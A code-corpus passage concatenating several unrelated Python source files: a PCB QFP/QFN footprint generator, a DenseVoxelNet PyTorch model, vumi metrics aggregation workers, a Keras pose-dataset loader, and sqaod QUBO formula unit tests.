        bodyDimensions, court, leadDimensions=None, lead="gullwing", offset = [0, 0], originMarkSize=-1):
        # originMarkSize < 0 means "auto": default size capped at 30% of body.
        # NOTE(review): `offset = [0, 0]` is a mutable default argument; it is
        # only read here (never mutated), but `offset=None` + fallback would
        # be the safer idiom.
        if originMarkSize<0:
            originMarkSize = min(defaults.originMarkSize, bodyDimensions[0]*0.3, bodyDimensions[1]*0.3)
        super().__init__(name, alternativeLibName=alternativeLibName, originMarkSize=originMarkSize)
        # pads, leads: one column of pads is generated on the left edge and
        # rotated by side*90 degrees for each of the four sides.
        y1 = pitch * (pinCount/8 - 0.5)
        for side in range(4):
            for y in range(int(pinCount/4)):
                pos = translatePoints(rotatePoints([[-padSpan[0]/2, y1-pitch*y]], side*90), offset)[0]
                self.primitives.append(pcbSmtPad(pcbLayer.topCopper, position=pos,\
                    dimensions=padDimensions, name=str(int(y+1+side*pinCount/4)),\
                    rotation=side*90))
                if leadDimensions:
                    # Lead sits just outside the body edge of this side.
                    self.addLead(rotatePoints(\
                        [[(-bodyDimensions[side%2]/2-leadDimensions[0]/2), y1-pitch*y]], side*90)[0],\
                        leadDimensions, rotation=side*90+180, lead=lead)
        # body
        self.addSimple3Dbody([0,0], bodyDimensions)
        # first pad marker: small metal cylinder near the pin-1 corner,
        # slightly below the body top (z = height - 0.05)
        pos=rotatePoint(scalePoint(bodyDimensions[0:2], 0.4),90)+[bodyDimensions[2]-0.05]
        radius = min(bodyDimensions[0]*0.05, bodyDimensions[1]*0.05, 0.5)
        self.addCylinder3Dbody(pos,[radius,radius,0.1],draw=True, file="cylinder_metal")
        # first pad marker - silk circle centered on the pin-1 pad position
        pos = [-padSpan[0]/2,padSpan[1]/2]
        radius=padDimensions[0]/2
        self.primitives.append(pcbCircle(pcbLayer.topSilk,defaults.silkWidth,\
            pos,radius))
        # courtyard: pad span grown by the larger pad dimension
        self.addCourtyardAndSilk([s+max(padDimensions) for s in padSpan], court)
        # texts: name above, value below the origin mark
        if originMarkSize:
            y = originMarkSize + defaults.documentationTextHeight
            self.nameObject.position=[0,y]
            self.valueObject.position=[0,-y]
class footprintQfpParametrized(footprintSmdQuad):
    """QFP footprint built from spreadsheet parameters (via icGenerator)."""

    def __init__(self, params, mechanical, footprint, variant, lead="gullwing",
        alternativeLibName=""):
        """
        Take parameters from excel file via icGenerator
        """
        name = "%s_%s" % (params["Name"], variant)
        if not alternativeLibName:
            alternativeLibName = "niceSemiconductors"
        # Land-pattern data for the requested density variant and the
        # worst-case ("Max") mechanical outline.
        land = footprint[variant]
        body = mechanical["Max"]
        lead_length = (body["E"] - body["E1"]) / 2
        super().__init__(
            name, alternativeLibName,
            pinCount=params["Pins"],
            pitch=mechanical["Typ"]["e"],
            padSpan=[land["C"], land["C"]],
            padDimensions=[land["Y"], land["X"]],
            bodyDimensions=[body["D1"], body["E1"], body["A"]],
            court=land["Court"],
            leadDimensions=[lead_length, body["b"], body["A"] * 0.6],
            lead=lead)
class footprintQfnParametrized(footprintQfpParametrized):
    """QFN footprint built from spreadsheet parameters (via icGenerator)."""
    def __init__(self, params, mechanical, footprint, variant, alternativeLibName=""):
        """
        Take parameters from excel file via icGenerator
        """
        # Bug fix: forward the caller-supplied alternativeLibName instead of
        # hard-coding "" (the parameter was silently ignored). The parent
        # still falls back to "niceSemiconductors" when it is empty, so the
        # behavior for existing callers is unchanged.
        super().__init__(params, mechanical, footprint, variant, lead="cube_metal",
            alternativeLibName=alternativeLibName)
class footprintQfp(footprintSmdQuad):
    """
    QFP (0.5, 0.65, 0.8, 1.0mm pitch). Based on Atmel datasheets.
    Dimension tables below are keyed by pitch, then pin count; pad tables
    additionally by IPC density ("L"/"N"/"M").
    NOTE(review): padSpan/padDimensions cover fewer pitch/pinCount combos
    than bodyDimensions, so some constructor arguments raise KeyError —
    confirm which variants are actually supported.
    """
    def __init__(self, pinCount, pitch, name="", alternativeLibName="", density="N"):
        # Default name encodes pin count, pitch and density, e.g. QFP-64-0.5_N.
        if not name:
            name="QFP-%d-%1.1f_%s"%(pinCount, pitch, density)
        if not alternativeLibName:
            alternativeLibName="niceSemiconductors"
        # [body width, body length, height] per pitch/pin count
        bodyDimensions={0.5:{32:[5.1,5.1, 1.2], 48:[7.1,7.1, 1.2], 64:[10.1,10.1, 1.2], 80:[12.1,12.1, 1.2],\
            100:[14.1,14.1, 1.2], 144:[20.1, 20.1, 1.2], 176:[24.1,24.1, 1.2], 208:[28.1, 28.1, 1.2],},\
            0.65:{20:[4.1,4.1, 1.2], 40:[7.1, 7.1, 1.2], 52:[10.1, 10.1, 1.2], 64:[12.1, 12.1, 1.2],\
            80:[14.1,14.1, 1.2], 112:[20.1,20.1, 1.2], 160:[28,28, 1.2]},\
            0.8:{32:[7.1,7.1, 1.2], 44:[10.1,10.1, 1.2], 52:[12.1,12.1, 1.2], 64:[14.1,14.1, 1.2]},\
            1.0:{36:[10.1,10.1, 1.2], 44:[12.1,12.1, 1.2], 52:[14.1,14.1, 1.2]}}
        # [length, width, height] of a lead per pitch
        leadDimensions={0.5:[1,0.27, 0.6], 0.65:[1, 0.38, 0.6], 0.8:[1,0.45, 0.6], 1.0:[1, 0.5, 0.6]}
        # pad-row center-to-center span per pitch/pin count/density
        padSpan={0.5:{48:{"L":[8.4, 8.4], "N":[8.4, 8.4], "M":[8.4, 8.4]},\
            64:{"L":[11.4, 11.4], "N":[11.4, 11.4], "M":[11.4, 11.4]},\
            100:{"L":[15.4, 15.4], "N":[15.4, 15.4], "M":[15.4, 15.4]}},\
            0.65:{80:{"L":[15.4, 15.4], "N":[15.4, 15.4], "M":[15.4, 15.4]}},\
            0.8:{32:{"L":[8.4, 8.4], "N":[8.4, 8.4], "M":[8.4, 8.4]},\
            44:{"L":[11.4, 11.4], "N":[11.4, 11.4], "M":[11.4, 11.4]},\
            64:{"L":[15.4, 15.4], "N":[15.4, 15.4], "M":[15.4, 15.4]}}}
        # [pad length, pad width] per pitch/density
        padDimensions={0.5:{"L":[1.5, 0.3], "N":[1.5, 0.3], "M":[1.5, 0.3]},\
            0.65:{"L":[1.5, 0.45], "N":[1.5, 0.45], "M":[1.5, 0.45]},\
            0.8:{"L":[1.5,0.55], "N":[1.5,0.55], "M":[1.5,0.55]}}
        super().__init__(name, alternativeLibName, pinCount=pinCount, pitch=pitch,\
            padSpan=padSpan[pitch][pinCount][density],\
            padDimensions=padDimensions[pitch][density],\
            bodyDimensions=bodyDimensions[pitch][pinCount], court = defaults.court[density],\
            leadDimensions=leadDimensions[pitch])
| StarcoderdataPython |
# Component version strings.
# NOTE(review): names suggest `mff` is the targeted game-client version,
# `mff_auto` this tool's own release and `updater` the update component —
# confirm against the project's release notes.
mff_auto = "0.9.5"
mff = "7.5.1"
updater = "1.1.0"
| StarcoderdataPython |
77215 | import torch
import torch.nn as nn
# from torchsummary import summary
# from lib.medzoo.BaseModelClass import BaseModel
"""
Implementation od DenseVoxelNet based on https://arxiv.org/abs/1708.00573
Hyperparameters used:
batch size = 3
weight decay = 0.0005
momentum = 0.9
lr = 0.05
"""
def init_weights(m):
    """
    Initialize conv/batch-norm weights of module `m` with a Gaussian
    distribution (mu = 0, sigma = 0.01), as in the DenseVoxelNet paper.
    Other module types are left untouched.
    """
    # Bug fix: torch.seed() takes no arguments (the original torch.seed(777)
    # raises TypeError); manual_seed is the reproducibility hook.
    torch.manual_seed(777)  # for reproducibility
    classname = m.__class__.__name__
    if classname.find('Conv') != -1 or classname.find('BatchNorm') != -1:
        m.weight.data.normal_(0.00, 0.01)
class DenseLayer(nn.Sequential):
    """BN -> LeakyReLU -> 3x3x3 conv (+ optional dropout), concatenating
    the conv output onto the input along the channel axis."""

    def __init__(self, num_input_features, growth_rate, bn_size, drop_rate=0.2):
        super(DenseLayer, self).__init__()
        out_channels = bn_size * growth_rate
        self.add_module('norm1', nn.BatchNorm3d(num_input_features))
        self.add_module('relu1', nn.LeakyReLU(0.1, inplace=True))
        self.add_module('conv1', nn.Conv3d(
            num_input_features, out_channels,
            kernel_size=3, stride=1, padding=1, bias=False))
        self.drop_rate = drop_rate
        if self.drop_rate > 0:
            self.drop_layer = nn.Dropout(p=self.drop_rate)

    def forward(self, x):
        out = super(DenseLayer, self).forward(x)
        if self.drop_rate > 0:
            out = self.drop_layer(out)
        # Dense connectivity: stack new features onto the input channels.
        return torch.cat([x, out], 1)
class DenseBlock(nn.Sequential):
    """Stack of DenseLayers whose input width grows by growth_rate per layer.

    Padding keeps spatial dims unchanged:
    o = [i + 2*p - k - (k-1)*(d-1)]/s + 1
    """

    def __init__(self, num_layers, num_input_features, bn_size, growth_rate, drop_rate=0.2):
        super(DenseBlock, self).__init__()
        for idx in range(num_layers):
            in_features = num_input_features + idx * growth_rate
            self.add_module(
                'denselayer%d' % (idx + 1),
                DenseLayer(in_features, growth_rate, bn_size, drop_rate))
class Transition(nn.Module):
    """BN -> LeakyReLU -> 1x1x1 conv, followed by 2x stride-2 max pooling.

    forward returns (pooled, pre_pool) so the un-pooled feature map can be
    reused (e.g. for skip connections).
    """

    def __init__(self, num_input_features, num_output_features):
        super(Transition, self).__init__()
        self.conv = nn.Sequential(
            nn.BatchNorm3d(num_input_features),
            nn.LeakyReLU(0.1, inplace=True),
            nn.Conv3d(num_input_features, num_output_features,
                      kernel_size=1, padding=0, stride=1),
        )
        self.max_pool = nn.MaxPool3d(kernel_size=2, stride=2)

    def forward(self, x):
        pre_pool = self.conv(x)
        return self.max_pool(pre_pool), pre_pool
class Upsampling(nn.Sequential):
    """BN -> ReLU -> 1x1 conv, then two stride-2 transposed convs (4x upsample).

    For a transposed conv:
    o = (i - 1)*s - 2*p + k + output_padding = (i-1)*2 + 2 = 2*i,
    so each stage doubles the spatial size.
    """

    def __init__(self, input_features, out_features):
        super(Upsampling, self).__init__()
        self.tr_conv1_features = 128  # intermediate width defined in the paper
        self.tr_conv2_features = out_features
        stages = [
            ('norm', nn.BatchNorm3d(input_features)),
            ('relu', nn.LeakyReLU(0.1, inplace=True)),
            ('conv', nn.Conv3d(input_features, input_features,
                               kernel_size=1, stride=1, padding=0, bias=False)),
            # Transposed convolutions are un-padded so o = 2*i exactly.
            ('transp_conv_1', nn.ConvTranspose3d(
                input_features, self.tr_conv1_features,
                kernel_size=2, padding=0, output_padding=0, stride=2)),
            ('transp_conv_2', nn.ConvTranspose3d(
                self.tr_conv1_features, self.tr_conv2_features,
                kernel_size=2, padding=0, output_padding=0, stride=2)),
        ]
        for tag, module in stages:
            self.add_module(tag, module)
| StarcoderdataPython |
20431 | # -*- test-case-name: vumi.blinkenlights.tests.test_metrics_workers -*-
import time
import random
import hashlib
from datetime import datetime
from twisted.python import log
from twisted.internet.defer import inlineCallbacks, Deferred
from twisted.internet import reactor
from twisted.internet.task import LoopingCall
from twisted.internet.protocol import DatagramProtocol
from vumi.service import Consumer, Publisher, Worker
from vumi.blinkenlights.metrics import (MetricsConsumer, MetricManager, Count,
Metric, Timer, Aggregator)
from vumi.blinkenlights.message20110818 import MetricMessage
class AggregatedMetricConsumer(Consumer):
    """Consumes aggregated metrics off the vumi.metrics.aggregates exchange.

    Parameters
    ----------
    callback : function (metric_name, values)
        Invoked once per metric datapoint; `values` is a list of
        (timestamp, value) pairs.
    """
    exchange_name = "vumi.metrics.aggregates"
    exchange_type = "direct"
    durable = True
    routing_key = "vumi.metrics.aggregates"

    def __init__(self, callback):
        self.queue_name = self.routing_key
        self.callback = callback

    def consume_message(self, vumi_message):
        metrics = MetricMessage.from_dict(vumi_message.payload)
        # Aggregator names are irrelevant here: the values are already
        # aggregated datapoints.
        for name, _aggregators, datapoints in metrics.datapoints():
            self.callback(name, datapoints)
class AggregatedMetricPublisher(Publisher):
    """Publishes aggregated metric datapoints onto the aggregates exchange."""
    exchange_name = "vumi.metrics.aggregates"
    exchange_type = "direct"
    durable = True
    routing_key = "vumi.metrics.aggregates"

    def publish_aggregate(self, metric_name, timestamp, value):
        """Publish a single (timestamp, value) datapoint for metric_name."""
        # TODO: perhaps change interface to publish multiple metrics?
        message = MetricMessage()
        message.append((metric_name, (), [(timestamp, value)]))
        self.publish_message(message)
class TimeBucketConsumer(Consumer):
    """Consume time bucketed metric messages.

    Parameters
    ----------
    bucket : int
        Bucket number to consume time buckets from.
    callback : function, f(metric_name, aggregators, values)
        Invoked once per metric datapoint with the metric name (str),
        the list of aggregator names, and a list of (timestamp, value)
        pairs.
    """
    exchange_name = "vumi.metrics.buckets"
    exchange_type = "direct"
    durable = True
    ROUTING_KEY_TEMPLATE = "bucket.%d"

    def __init__(self, bucket, callback):
        # Queue and routing key both encode the bucket number, so each
        # aggregator worker only receives its own bucket's messages.
        self.queue_name = self.ROUTING_KEY_TEMPLATE % bucket
        self.routing_key = self.queue_name
        self.callback = callback

    def consume_message(self, vumi_message):
        message = MetricMessage.from_dict(vumi_message.payload)
        for name, aggregators, datapoints in message.datapoints():
            self.callback(name, aggregators, datapoints)
class TimeBucketPublisher(Publisher):
    """Publish time bucketed metric messages.

    Parameters
    ----------
    buckets : int
        Total number of buckets messages are being distributed to.
    bucket_size : int, in seconds
        Size of each time bucket in seconds.
    """
    exchange_name = "vumi.metrics.buckets"
    exchange_type = "direct"
    durable = True
    ROUTING_KEY_TEMPLATE = "bucket.%d"

    def __init__(self, buckets, bucket_size):
        self.buckets = buckets
        self.bucket_size = bucket_size

    def find_bucket(self, metric_name, ts_key):
        """Deterministically map a (metric, time-key) pair to a bucket."""
        # NOTE: Python 2 code — md5 of a str, integer `/` below.
        digest = hashlib.md5("%s:%d" % (metric_name, ts_key))
        return int(digest.hexdigest(), 16) % self.buckets

    def publish_metric(self, metric_name, aggregates, values):
        """Split datapoints by time bucket and publish one message each."""
        by_ts_key = {}
        for timestamp, value in values:
            key = int(timestamp) / self.bucket_size
            by_ts_key.setdefault(key, []).append((timestamp, value))
        for key, datapoints in by_ts_key.iteritems():
            bucket = self.find_bucket(metric_name, key)
            msg = MetricMessage()
            msg.append((metric_name, aggregates, datapoints))
            self.publish_message(msg, routing_key=self.ROUTING_KEY_TEMPLATE % bucket)
class MetricTimeBucket(Worker):
    """Gathers metrics messages and redistributes them to aggregators.
    :class:`MetricTimeBuckets` take metrics from the vumi.metrics
    exchange and redistribute them to one of N :class:`MetricAggregator`
    workers.
    There can be any number of :class:`MetricTimeBucket` workers.
    Configuration Values
    --------------------
    buckets : int (N)
        The total number of aggregator workers. :class:`MetricAggregator`
        workers must be started with bucket numbers 0 to N-1 otherwise
        metric data will go missing (or at best be stuck in a queue
        somewhere).
    bucket_size : int, in seconds
        The amount of time each time bucket represents.
    """
    @inlineCallbacks
    def startWorker(self):
        # Wire each incoming metric straight into the bucket publisher: the
        # consumer's callback is the publisher's publish_metric method.
        log.msg("Starting a MetricTimeBucket with config: %s" % self.config)
        buckets = int(self.config.get("buckets"))
        log.msg("Total number of buckets %d" % buckets)
        bucket_size = int(self.config.get("bucket_size"))
        log.msg("Bucket size is %d seconds" % bucket_size)
        self.publisher = yield self.start_publisher(TimeBucketPublisher,
                                                    buckets, bucket_size)
        self.consumer = yield self.start_consumer(MetricsConsumer,
                                                  self.publisher.publish_metric)
class DiscardedMetricError(Exception):
    """Logged by MetricAggregator when metric data arrives too late for a
    time bucket that has already been processed and must be thrown away."""
    pass
class MetricAggregator(Worker):
    """Gathers a subset of metrics and aggregates them.
    :class:`MetricAggregators` work in sets of N.
    Configuration Values
    --------------------
    bucket : int, 0 to N-1
        An aggregator needs to know which number out of N it is. This is
        its bucket number.
    bucket_size : int, in seconds
        The amount of time each time bucket represents.
    lag : int, seconds, optional
        The number of seconds after a bucket's time ends to wait
        before processing the bucket. Default is 5s.
    """
    _time = time.time # hook for faking time in tests
    def _ts_key(self, time):
        # Time-bucket key for a timestamp.
        # NOTE: Python 2 integer division; under Python 3 this would need //.
        return int(time) / self.bucket_size
    @inlineCallbacks
    def startWorker(self):
        log.msg("Starting a MetricAggregator with config: %s" % self.config)
        bucket = int(self.config.get("bucket"))
        log.msg("MetricAggregator bucket %d" % bucket)
        self.bucket_size = int(self.config.get("bucket_size"))
        log.msg("Bucket size is %d seconds" % self.bucket_size)
        self.lag = float(self.config.get("lag", 5.0))
        # ts_key -> { metric_name -> (aggregate_set, values) }
        # values is a list of (timestamp, value) pairs
        self.buckets = {}
        # initialize last processed bucket (anything at or before this key
        # is considered too old and will be discarded)
        self._last_ts_key = self._ts_key(self._time() - self.lag) - 2
        self.publisher = yield self.start_publisher(AggregatedMetricPublisher)
        self.consumer = yield self.start_consumer(TimeBucketConsumer,
                                                  bucket, self.consume_metric)
        # Periodically flush completed buckets.
        self._task = LoopingCall(self.check_buckets)
        done = self._task.start(self.bucket_size, False)
        done.addErrback(lambda failure: log.err(failure,
                        "MetricAggregator bucket checking task died"))
    def check_buckets(self):
        """Periodically clean out old buckets and calculate aggregates."""
        # key for previous bucket
        current_ts_key = self._ts_key(self._time() - self.lag) - 1
        for ts_key in self.buckets.keys():
            if ts_key <= self._last_ts_key:
                # Data older than the last processed bucket: discard loudly.
                log.err(DiscardedMetricError("Throwing way old metric data: %r"
                                             % self.buckets[ts_key]))
                del self.buckets[ts_key]
            elif ts_key <= current_ts_key:
                # Bucket complete: compute one aggregate per requested
                # aggregator (e.g. metric.sum, metric.avg) and publish.
                aggregates = []
                ts = ts_key * self.bucket_size
                items = self.buckets[ts_key].iteritems()
                for metric_name, (agg_set, values) in items:
                    for agg_name in agg_set:
                        agg_metric = "%s.%s" % (metric_name, agg_name)
                        agg_func = Aggregator.from_name(agg_name)
                        agg_value = agg_func([v[1] for v in values])
                        aggregates.append((agg_metric, agg_value))
                for agg_metric, agg_value in aggregates:
                    self.publisher.publish_aggregate(agg_metric, ts,
                                                     agg_value)
                del self.buckets[ts_key]
        self._last_ts_key = current_ts_key
    def consume_metric(self, metric_name, aggregates, values):
        # Accumulate incoming datapoints into the bucket keyed by the first
        # datapoint's timestamp (all values in a message share one bucket).
        if not values:
            return
        ts_key = self._ts_key(values[0][0])
        metrics = self.buckets.get(ts_key, None)
        if metrics is None:
            metrics = self.buckets[ts_key] = {}
        metric = metrics.get(metric_name)
        if metric is None:
            metric = metrics[metric_name] = (set(), [])
        existing_aggregates, existing_values = metric
        existing_aggregates.update(aggregates)
        existing_values.extend(values)
    def stopWorker(self):
        # Flush whatever is pending before shutting down.
        self._task.stop()
        self.check_buckets()
class MetricsCollectorWorker(Worker):
    """Base worker that consumes aggregated metrics and hands each datapoint
    to :meth:`consume_metrics`; subclasses override the setup/teardown/consume
    hooks."""
    @inlineCallbacks
    def startWorker(self):
        log.msg("Starting %s with config: %s" % (
            type(self).__name__, self.config))
        yield self.setup_worker()
        self.consumer = yield self.start_consumer(
            AggregatedMetricConsumer, self.consume_metrics)
    def stopWorker(self):
        log.msg("Stopping %s" % (type(self).__name__,))
        return self.teardown_worker()
    def setup_worker(self):
        """Hook: set up resources before consuming starts (may return a Deferred)."""
        pass
    def teardown_worker(self):
        """Hook: release resources on shutdown (may return a Deferred)."""
        pass
    def consume_metrics(self, metric_name, values):
        """Handle one metric's list of (timestamp, value) pairs."""
        raise NotImplementedError()
class GraphitePublisher(Publisher):
    """Publisher for sending messages to Graphite."""
    exchange_name = "graphite"
    exchange_type = "topic"
    durable = True
    auto_delete = False
    delivery_mode = 2  # persistent messages
    require_bind = False # Graphite uses a topic exchange
    def publish_metric(self, metric, value, timestamp):
        # Graphite's AMQP format: "<value> <timestamp>" with the metric name
        # carried in the routing key.
        self.publish_raw("%f %d" % (value, timestamp), routing_key=metric)
class GraphiteMetricsCollector(MetricsCollectorWorker):
    """Worker that collects Vumi metrics and publishes them to Graphite."""

    @inlineCallbacks
    def setup_worker(self):
        self.graphite_publisher = yield self.start_publisher(GraphitePublisher)

    def consume_metrics(self, metric_name, values):
        # Forward each datapoint individually to Graphite.
        for ts, val in values:
            self.graphite_publisher.publish_metric(metric_name, val, ts)
class UDPMetricsProtocol(DatagramProtocol):
    """Datagram protocol that forwards metric strings to one UDP endpoint."""

    def __init__(self, ip, port):
        # NOTE: `ip` must be a numeric IP address, not a hostname.
        self._ip = ip
        self._port = port

    def startProtocol(self):
        # Connected UDP: subsequent write() calls go to the fixed endpoint.
        self.transport.connect(self._ip, self._port)

    def send_metric(self, metric_string):
        return self.transport.write(metric_string)
class UDPMetricsCollector(MetricsCollectorWorker):
    """Worker that collects Vumi metrics and publishes them over UDP."""
    # %-style template filled with timestamp/metric_name/value per datapoint.
    DEFAULT_FORMAT_STRING = '%(timestamp)s %(metric_name)s %(value)s\n'
    # strftime format applied to each datapoint's UTC timestamp.
    DEFAULT_TIMESTAMP_FORMAT = '%Y-%m-%d %H:%M:%S%z'
    @inlineCallbacks
    def setup_worker(self):
        self.format_string = self.config.get(
            'format_string', self.DEFAULT_FORMAT_STRING)
        self.timestamp_format = self.config.get(
            'timestamp_format', self.DEFAULT_TIMESTAMP_FORMAT)
        # Resolve the configured hostname once; the protocol requires an IP.
        self.metrics_ip = yield reactor.resolve(self.config['metrics_host'])
        self.metrics_port = int(self.config['metrics_port'])
        self.metrics_protocol = UDPMetricsProtocol(
            self.metrics_ip, self.metrics_port)
        # Port 0: let the OS pick an ephemeral local port.
        self.listener = yield reactor.listenUDP(0, self.metrics_protocol)
    def teardown_worker(self):
        # Stop the UDP listener; returns a Deferred the base class waits on.
        return self.listener.stopListening()
    def consume_metrics(self, metric_name, values):
        # Format and send one datagram per datapoint.
        for timestamp, value in values:
            timestamp = datetime.utcfromtimestamp(timestamp)
            metric_string = self.format_string % {
                'timestamp': timestamp.strftime(self.timestamp_format),
                'metric_name': metric_name,
                'value': value,
                }
            self.metrics_protocol.send_metric(metric_string)
class RandomMetricsGenerator(Worker):
    """Worker that publishes a set of random metrics.
    Useful for tests and demonstrations.
    Configuration Values
    --------------------
    manager_period : float in seconds, optional
        How often to have the internal metric manager send metrics
        messages. Default is 5s.
    generator_period: float in seconds, optional
        How often the random metric loop should send values to the
        metric manager. Default is 1s.
    """
    # callback for tests, f(worker)
    # (or anyone else that wants to be notified when metrics are generated)
    on_run = None
    @inlineCallbacks
    def startWorker(self):
        log.msg("Starting the MetricsGenerator with config: %s" % self.config)
        manager_period = float(self.config.get("manager_period", 5.0))
        log.msg("MetricManager will sent metrics every %s seconds" %
                manager_period)
        generator_period = float(self.config.get("generator_period", 1.0))
        log.msg("Random metrics values will be generated every %s seconds" %
                generator_period)
        # Three demo metrics under the vumi.random.* prefix: a counter,
        # a gauge-style value and a timer.
        self.mm = yield self.start_publisher(MetricManager, "vumi.random.",
                                             manager_period)
        self.counter = self.mm.register(Count("count"))
        self.value = self.mm.register(Metric("value"))
        self.timer = self.mm.register(Timer("timer"))
        self.next = Deferred()
        self.task = LoopingCall(self.run)
        self.task.start(generator_period)
    @inlineCallbacks
    def run(self):
        # Randomly bump the counter about half the time.
        if random.choice([True, False]):
            self.counter.inc()
        # Gauge drawn from a normal distribution around 2.0.
        self.value.set(random.normalvariate(2.0, 0.1))
        # Time a random 0-100ms asynchronous wait.
        with self.timer:
            d = Deferred()
            wait = random.uniform(0.0, 0.1)
            reactor.callLater(wait, lambda: d.callback(None))
            yield d
        if self.on_run is not None:
            self.on_run(self)
    def stopWorker(self):
        self.mm.stop()
        self.task.stop()
        log.msg("Stopping the MetricsGenerator")
| StarcoderdataPython |
140233 | <reponame>knownstranger03/Human_Pose_Estimation
from keras.preprocessing.image import ImageDataGenerator
import numpy as np, pandas as pd, sklearn
from sklearn.preprocessing import OneHotEncoder
from sklearn.model_selection import train_test_split
def prep(data_root='../Data/Pose_Dataset/', batch_size=40,
         target_size=(224, 224), validation_split=0.10):
    """Build train/validation/test image generators for joint regression.

    Generalized from hard-coded constants; the defaults reproduce the
    original behavior exactly.

    Parameters
    ----------
    data_root : str
        Directory containing `train/`, `test/` and the
        `*_joints_coords.csv` files (column 0 = image filename,
        columns 1-14 = joint coordinates).
    batch_size : int
        Batch size for all three generators.
    target_size : tuple of int
        Size images are resized to.
    validation_split : float
        Fraction of the training CSV held out for validation.

    Returns
    -------
    (train, valid, test) Keras dataframe iterators.
    """
    label_cols = list(np.arange(1, 15, 1))  # the 14 joint-coordinate columns
    generator = ImageDataGenerator(validation_split=validation_split)
    train_df = pd.read_csv(data_root + 'train_joints_coords.csv', header=None)
    test_df = pd.read_csv(data_root + 'test_joints_coords.csv', header=None)
    train_img = data_root + 'train/'
    test_img = data_root + 'test/'
    train = generator.flow_from_dataframe(train_df, directory=train_img,
                                          batch_size=batch_size,
                                          target_size=target_size, x_col=0,
                                          y_col=label_cols, class_mode='raw',
                                          subset="training")
    valid = generator.flow_from_dataframe(train_df, directory=train_img,
                                          batch_size=batch_size,
                                          target_size=target_size, x_col=0,
                                          y_col=label_cols, class_mode='raw',
                                          subset="validation")
    # The test generator gets no validation split.
    test_generator = ImageDataGenerator()
    test = test_generator.flow_from_dataframe(test_df, directory=test_img,
                                              x_col=0, y_col=label_cols,
                                              class_mode='raw',
                                              target_size=target_size,
                                              batch_size=batch_size)
    print("Reading Data...")
    return train, valid, test
def prep2(csv_path='../Data/Action_Dataset/action_joints.csv', test_size=0.1):
    """Load the action-joints dataset, one-hot encode labels and split it.

    Generalized from hard-coded constants; defaults reproduce the original
    behavior exactly.

    Parameters
    ----------
    csv_path : str
        Path to the action joints CSV.
    test_size : float
        Fraction of samples held out for validation.

    Returns
    -------
    (x_train, y_train, x_val, y_val, enc) — the fitted OneHotEncoder is
    returned so predictions can be inverse-transformed later.
    """
    # Importing Action Joints Dataset
    df = pd.read_csv(csv_path)
    df.columns = list(range(df.shape[1]))  # numeric column names 0..n-1
    # Columns 1..n-2 are features; column 0 is skipped (presumably an
    # index/filename — confirm) and the last column holds the action label.
    x = df.iloc[:, 1:-1]
    y = df.iloc[:, -1].values.reshape(-1, 1)
    enc = OneHotEncoder()
    y = enc.fit_transform(y).toarray()
    x_train, x_val, y_train, y_val = train_test_split(x, y, test_size=test_size)
    return x_train, y_train, x_val, y_val, enc
| StarcoderdataPython |
3315578 | <gh_stars>10-100
from __future__ import print_function
import unittest
import numpy as np
import sqaod as sq
import sqaod.common as common
from .example_problems import *
class TestDenseGraphFormulasBase :
    """Shared test bodies for dense-graph QUBO formula implementations.
    Mixin only: it calls unittest assert* methods, so concrete subclasses
    must also inherit unittest.TestCase (see TestPyDenseGraphFormulas).
    `pkg` is the sqaod backend under test, `dtype` its float precision.
    (sic: the "engery" method-name typos are kept — renaming would change
    which tests unittest discovers.)
    """
    def __init__(self, pkg, dtype) :
        self.pkg = pkg
        self.dtype = dtype
        # Comparison tolerance scaled to the backend's precision.
        self.epu = 1.e-6 if dtype == np.float32 else 1.e-12
    def new_W(self, N) :
        # Random symmetric QUBO weight matrix of size N x N.
        return common.generate_random_symmetric_W((N), dtype=np.float64)
    def test_engery_with_zero_x(self):
        # E must be 0 for the all-zeros bit vector.
        N = 8
        W = self.new_W(N)
        x = np.zeros(N, np.int8)
        Equbo = self.pkg.formulas.dense_graph_calculate_E(W, x, self.dtype)
        self.assertEqual(Equbo, 0.)
    def test_engery_with_one_x(self):
        # E for the all-ones bit vector equals the sum of all weights.
        N = 8
        W = self.new_W(N)
        x = np.ones(N, np.int8)
        Equbo = self.pkg.formulas.dense_graph_calculate_E(W, x, self.dtype)
        self.assertTrue(np.allclose(Equbo, np.sum(W)))
    def test_engery(self):
        # Batched E over all 2**N bitsets must match per-bitset E.
        N = 8
        W = self.new_W(N)
        xlist = common.create_bitset_sequence(range(0, 2 ** N), N)
        Ebatched = self.pkg.formulas.dense_graph_batch_calculate_E(W, xlist, self.dtype)
        E = np.ones((2 ** N))
        for i in range(0, 2 ** N) :
            E[i] = self.pkg.formulas.dense_graph_calculate_E(W, xlist[i], self.dtype)
        self.assertTrue(np.allclose(Ebatched, E, atol=self.epu))
    def test_energy_batch_1(self):
        # Batch calculation fed one bitset at a time must agree with the
        # full batch. NOTE(review): xlist[i] is a single bitset passed to
        # the batch API — confirm it is meant to accept 1-row batches.
        N = 8
        W = self.new_W(N)
        xlist = common.create_bitset_sequence(range(0, 2 ** N), N)
        Ebatched = self.pkg.formulas.dense_graph_batch_calculate_E(W, xlist, self.dtype)
        E = np.empty((2 ** N))
        for i in range(0, 2 ** N) :
            E[i] = self.pkg.formulas.dense_graph_batch_calculate_E(W, xlist[i], self.dtype)[0]
        self.assertTrue(np.allclose(Ebatched, E, atol=self.epu))
    def test_hamiltonian_energy(self):
        # QUBO energy and Ising (h, J, c) energy must agree for every bitset
        # under the x -> q = 2x - 1 spin mapping.
        N = 8
        W = common.generate_random_symmetric_W((N), dtype=np.float64)
        h, J, c = self.pkg.formulas.dense_graph_calculate_hamiltonian(W, self.dtype)
        # identity
        self.assertTrue(np.allclose(0., - np.sum(h) + np.sum(J) + c, atol=self.epu))
        xlist = common.create_bitset_sequence(range(0, 2 ** N), N)
        for idx in range(0, 2 ** N) :
            x = xlist[idx]
            Equbo = self.pkg.formulas.dense_graph_calculate_E(W, x, self.dtype)
            q = 2 * x - 1
            Eising = self.pkg.formulas.dense_graph_calculate_E_from_spin(h, J, c, q, self.dtype)
            self.assertTrue(np.allclose(Equbo, Eising, atol=self.epu))
    def test_hamiltonian_energy_batched(self):
        # Same QUBO/Ising agreement, using the batched spin-energy API.
        N = 8
        W = common.generate_random_symmetric_W((N), dtype=np.float64)
        h, J, c = self.pkg.formulas.dense_graph_calculate_hamiltonian(W, self.dtype)
        # identity
        self.assertTrue(np.allclose(0., - np.sum(h) + np.sum(J) + c, atol=self.epu))
        xlist = common.create_bitset_sequence(range(0, 2 ** N), N)
        Equbo = self.pkg.formulas.dense_graph_batch_calculate_E(W, xlist, self.dtype)
        qlist = 2 * xlist - 1
